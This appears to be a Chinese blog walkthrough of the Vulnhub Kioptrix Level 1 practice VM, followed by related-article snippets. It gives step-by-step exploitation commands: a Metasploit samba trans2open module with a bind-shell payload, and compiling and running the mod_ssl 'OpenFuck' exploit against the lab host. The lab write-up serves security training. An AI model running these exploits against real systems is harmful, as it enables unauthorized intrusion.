Vuluhb靶机 Kioptrix Level 1

最新推荐文章于 2023-10-14 16:08:52 发布
最新推荐文章于 2023-10-14 16:08:52 发布
阅读量341 收藏
点赞数
分类专栏: vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38005854/article/details/105290230
版权

在这里插入图片描述
靶机137
22 80 11 139 443 1024 端口

这个靶机有两种解法

解法一 samba

在这里插入图片描述
msf查找samba漏洞

msfconsole
search samba

在这里插入图片描述
使用漏洞
查看配置情况
完整配置

use exploit/linux/samba/trans2open
show options
set RHOSTS 192.168.0.137
set PAYLOAD linux/x86/shell_bind_tcp

在这里插入图片描述
完成

解法二 mod_ssl

在这里插入图片描述
查找漏洞

searchsploit mod_ssl

在这里插入图片描述
移动到桌面
复制文件47080.c到桌面

在这里插入图片描述

查看一下开头,注释已经很明白了,跟着做就行了

head 47080.c

在这里插入图片描述

apt-get install libssl-dev

在这里插入图片描述

gcc -o OpenFuck 47080.c -lcrypto
ls
./OpenFuck 0x6b 192.168.0.137 443 -c 40

完成

菜浪马废
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
KIOPTRIX: LEVEL 1 (#1)
logan_logan的博客
12-19 501
KIOPTRIX: LEVEL 1 (#1) 1.浏览器输入地址打开,是一个Test page网页,接下来开始进行信息收集; 2.信息收集 2.1 使用namp工具对端口进行扫描 发现apache的版本较老,同时开了samba服务,接下来考虑对这两个信息进行更深入的验证。 2.2 使用gobuster枚举目录 对扫描的目录进行验证之后发现没有多少有用信息; 3.漏洞探测 3.1 apache漏洞探测 在kali里面搜索漏洞,接下来开始进行尝试 3.2 samba漏洞探测 使用msf探测到samba版
CFIX(Samba)服务的使用
心飞扬Q
11-18 791
Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。SMB协议是客户机/服务器型协议,客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。通过设置“NetBIOS over TCP/IP”使得Samba不但能与局域网络主机分享资源,还能与全世界的电脑分享资源。( ---来...
Vulnhub入门实战-Wakanda
qq_24033605的博客
07-14 2211
下载链接 描述: 1.探测主机的IP地址 2.使用nmap查看靶机开放端口。 开放了4个端口,老样子先从http下手。 3.进去发现没什么可以点的,于是进行目录扫描。 状态码都是200,但是size为0,所以返回的都是空页面。 查看主页源代码,发现一个注释。 猜测存在本地文件包含漏洞,抓包看一下。 成功读取主页源码,并发现密码,猜测下一步根据账号和密码进行ssh登录。 账户猜测就是主页的namemamadou,passwdNiamey4Ever227!!! 这里的使用凭证是有效的,但是还
VulnHub Kioptrix Level 1进行渗透测试的总结与过程
Ba1_Ma0的博客
03-01 1609
Kioptrix_Level_1 主机发现 用netdiscover工具进行内网主机发现。 Netdiscover简介:专用的二层发现工具。拥有主动和被动发现两种方式。 我使用以下命令: netdiscover -i eth0 命令解释 -i:网卡,选择你监控的网卡。比如eth0。 如图: 工具执行后内容: ip192.168.1.104与ip192.168.1.103都是我的主机,只有ip192.168.1.102是未知的主机,所以目标主机ip为192.168.1.102。 内网发现也能用nm
Vulnhub实战-prime1
最新发布
annebab的博客
10-14 100
VulnHub 是一个面向信息安全爱好者和专业人士的虚拟机(VM)漏洞测试平台。它提供了一系列特制的漏洞测试虚拟机镜像,供用户通过攻击和漏洞利用的练习来提升自己的安全技能。本次,我们本次测试的是prime1。
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机是Vulnhub靶机Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
DC1 靶机复现详细流程
10-02
DC1 靶机复现详细流程
Kioptrix2-WalkThrough 靶机复现.docx
10-18
1. 信息收集:使用 nmap 工具对靶机进行 IP 探活和端口扫描。 2. SQL 注入:使用万能密码尝试登录到靶机上。 3. 命令执行:使用;pwd 命令来确定当前目录,并执行系统命令。 4. 反弹 shell:使用 nc 命令将 shell ...
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
vulhub渗透测试靶机学习1
08-08
在本文中,我们将讨论两个靶机环境:Lampiao 和 Kioptrix Level 1.2 (#3),以及如何对它们进行初步的分析和攻击。 首先,我们关注的是Lampiao靶机。这个靶机可以从VulnHub下载,地址是...
Kioptrix_Level_1
12-30
Download from https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
Vulnhub Healthcare靶机教程
一个努力学习网安的小牛马
10-10 197
Vulnhub靶机 Healthcare 保姆级教程 过程内容详细
kioptrix.level1 -VulnHub靶机学习记录
weixin_45509443的博客
06-16 565
1.
Kioptrix Level 1 靶机wp
m0_52496313的博客
08-10 1015
Kioptrix Level 1 靶机wp
渗透日记————Kioptrix Level 1
m0_73700261的博客
04-09 405
扫描端口发现有以下端口开放其中比较重要的有三个端口开放80 22 和139端口。接着使用msf查看版本漏洞接着搜索看看有没有对应的漏洞。sumba端口是Linux系统上的一个免费软件。接着设置攻击靶机ip和对应的payload。cd进入根目录ls一下发现可以成功命令执行。发现靶机ip为:10.102.8.194。是用来为局域网内为不同计算机提供共享服务。发现该sambe服务器为2.2.1a。那么第一步先扫描发现靶机的地址。139端口是一个sumba端口。接着继续搜索历史漏洞。
【VulnHub靶场】——CFS三层靶机内网渗透实操
热门推荐
Demo不是emo的博客
08-07 1万+
CFS三层靶场实操
VulnHub——Kioptrix Level 1
江左盟的博客
04-18 616
简介 信息收集 使用fping -agq 192.168.204.0/24探测局域网内其它主机,发现存在其它3台主机,如图: 使用nmap --min-rate 10000 -T5 192.168.0.102 192.168.0.100 192.168.0.126快速扫描这三台主机,发现只有一台是VMware,且开启了22,80,111,139,443和1024端口,如图: ...
vulnhub靶机HA wordy渗透测试
Long_gone的博客
10-04 630
打开靶机后,先扫描一下靶机IP是多少: netdiscover 由经验推断出靶机IP为:192.168.34.224,然后使用使用nmap扫描一下靶机端口开放情况: nmap -sV -p 0-65535 192.168.34.224 发现有http端口开放,然后访问一下看看: 在页面并没有什么发现,然后我们先使用目录爆破一下看看: dirb http://192.168.34.224:...
渗透靶机靶机无法分配ip的解决办法
qq_40510246的博客
11-18 3182
debian: 拿DC-4靶机说,在用kali扫描存活主机的时候发现无法获取ip 重启DC-4,按e,添加一下命令 然后按CTRL+X 进入单用户模式,编辑/etc/network/interfaces 保存之后使用命令/etc/init.d/networking restart重启网卡配置,之后再查看ip发现已经ok 使用exit退出,之后重启靶机即可 ubunt...
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值